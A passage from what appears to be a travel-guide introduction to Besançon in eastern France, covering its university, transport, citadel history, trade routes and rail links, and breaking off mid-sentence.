Besançon is the capital and principal city of the Franche-Comté region in eastern France. Located close to the border with Switzerland, it is the capital of the Doubs department. As well as being famed as one of France's finest villes d'art (art cities), Besançon is the seat of one of France's older universities, of France's National School of Mechanics and Micromechanics, and of one of the best known French language schools in France, the CLA. It is also reputed to be France's most environmentally friendly city, with a public transport network that has often been cited as a model. On account of the topography, the historic city centre lies at the edge of the modern city, and hiking tracks lead straight from the centre up into the surrounding hills. The Citadel of Besançon dates back to the Celtic era. In his De Bello Gallico, Julius Caesar already said of the fortress of Vesontio (the Celtic name of Besançon) that it was one of the best defensive sites he had ever seen. Besançon is situated at the crossing of two major lines of communication: the NE-SW route, following the valley of the river Doubs and linking Germany and northern Europe with Lyon and southwestern Europe, and the N-S route linking northern France and the Netherlands with Switzerland. A key staging post on the Strasbourg-Lyon (Germany-Spain) route, it also has direct high-speed train (TGV) links with Paris, Charles de Gaulle International Airport, and Lille. Unusually for a town of its size, it does not have a commercial airport,